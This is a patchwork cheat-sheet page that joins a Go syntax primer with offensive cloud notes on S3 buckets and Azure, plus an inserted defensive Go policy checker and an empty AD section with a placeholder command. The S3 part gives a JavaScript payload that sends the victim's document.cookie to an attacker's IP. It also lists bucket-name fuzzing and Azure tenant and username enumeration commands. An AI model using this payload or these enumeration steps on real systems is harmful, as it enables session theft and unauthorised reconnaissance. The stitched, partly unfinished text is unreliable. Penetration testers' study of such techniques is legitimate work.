Hello World

A sample Go program is shown here.

package main

import "fmt"

func main() {
  message := greetMe("world")
  fmt.Println(message)
}

func greetMe(name string) string {
  return "Hello, " + name + "!"
}

Run the program as below:

$ go run hello.go

Variables

Normal Declaration:

var msg string
msg = "Hello"

Shortcut:

msg := "Hello"

Constants

const Phi = 1.618

Strings

str := "Hello"

Multiline string

str := `Multiline
string`

Numbers

Typical types

num := 3          // int
num := 3.         // float64
num := 3 + 4i     // complex128
num := byte('a')  // byte (alias for uint8)

Other Types

var u uint = 7        // uint (unsigned)
var p float32 = 22.7  // 32-bit float

Arrays

// var numbers [5]int
numbers := [...]int{0, 0, 0, 0, 0}

Pointers

func main() {
  b := *getPointer()
  fmt.Println("Value is", b)
}

// Returning the address of a local variable is safe in Go.
func getPointer() (myPointer *int) {
  a := 234
  return &a
}

a := new(int)
*a = 234

Pointers point to a memory location of a variable. Go is fully garbage-collected.

Type Conversion

i := 2
f := float64(i)
u := uint(i)

Slice

slice := []int{2, 3, 4}
slice := []byte("Hello")

Condition

if day == "sunday" || day == "saturday" {
  rest()
} else if day == "monday" && isTired() {
  groan()
} else {
  work()
}

if _, err := doThing(); err != nil {
  fmt.Println("Uh oh")
}

Switch

switch day {
  case "sunday":
    // cases don't "fall through" by default!
    fallthrough

  case "saturday":
    rest()

  default:
    work()
}

Loop

for count := 0; count <= 10; count++ {
  fmt.Println("My counter is at", count)
}

entry := []string{"Jack", "John", "Jones"}
for i, val := range entry {
  fmt.Printf("At position %d, the character %s is present\n", i, val)
}

n := 0
x := 42
for n != x {
  n = guess() // assign to the outer n; := would shadow it and the loop would never end
}

S3 Buckets

Check for Writable S3 Buckets

  • If you can upload, then you can show impact by changing JS to steal cookies and other things.
    var xhr=new XMLHttpRequest();
    xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true);
    xhr.send();
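
A defender-side check for the writable-bucket condition above, as an added example that is not part of the original page: it parses a bucket policy document and reports the statements that let an anonymous principal write or delete objects. The function names and the sample policy are constructed for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Constructed sample policy; bucket name and account ID are placeholders.
const samplePolicy = `{"Version":"2012-10-17","Statement":[
 {"Sid":"PublicRead","Effect":"Allow","Principal":"*","Action":"s3:GetObject","Resource":"arn:aws:s3:::example-bucket/*"},
 {"Sid":"AnyoneUploads","Effect":"Allow","Principal":{"AWS":"*"},"Action":["s3:GetObject","s3:PutObject"],"Resource":"arn:aws:s3:::example-bucket/*"},
 {"Sid":"CIWrites","Effect":"Allow","Principal":{"AWS":"arn:aws:iam::111122223333:role/ci"},"Action":"s3:*","Resource":"arn:aws:s3:::example-bucket/*"}]}`

// values flattens a field that is a string, a list, or {"AWS": ...} into lower-cased strings.
func values(v interface{}) (out []string) {
	switch t := v.(type) {
	case string:
		out = append(out, strings.ToLower(t))
	case []interface{}:
		for _, e := range t {
			out = append(out, values(e)...)
		}
	case map[string]interface{}:
		out = values(t["AWS"])
	}
	return out
}

// PublicWriteSids (hypothetical helper): Sids of unconditional Allow statements open to "*" for write/delete.
func PublicWriteSids(policy string) (hits []string, err error) {
	var doc struct{ Statement []map[string]interface{} }
	err = json.Unmarshal([]byte(policy), &doc)
	for _, st := range doc.Statement {
		anon, write := false, false
		for _, p := range values(st["Principal"]) {
			anon = anon || p == "*"
		}
		for _, a := range values(st["Action"]) {
			write = write || a == "*" || a == "s3:*" || strings.HasPrefix(a, "s3:put") || strings.HasPrefix(a, "s3:delete")
		}
		if st["Effect"] == "Allow" && st["Condition"] == nil && anon && write {
			hits = append(hits, fmt.Sprint(st["Sid"]))
		}
	}
	return hits, err
}

func main() { fmt.Println(PublicWriteSids(samplePolicy)) }
```

Bucket ACLs can also grant public write and are not covered by this check; statements that carry a Condition are skipped and need manual review.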
    

Check for Bucket Versioning

curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com  # Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request

Brute Force Bucket Names (assuming patterns are found)

ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt

Odds and ends that sometimes help

Check for AWS Account Number

aws sts get-access-key-info --access-key-id <AKIA Key>

Recon and Enumeration

Get basic information about the domain

https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1

AAD Internals

Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>

Azure Subdomain Enumeration

#github https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v

Username Enumeration

GitHub: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt

Windows AD Enumeration

This is a sample command in a code block

python3 helloworld.py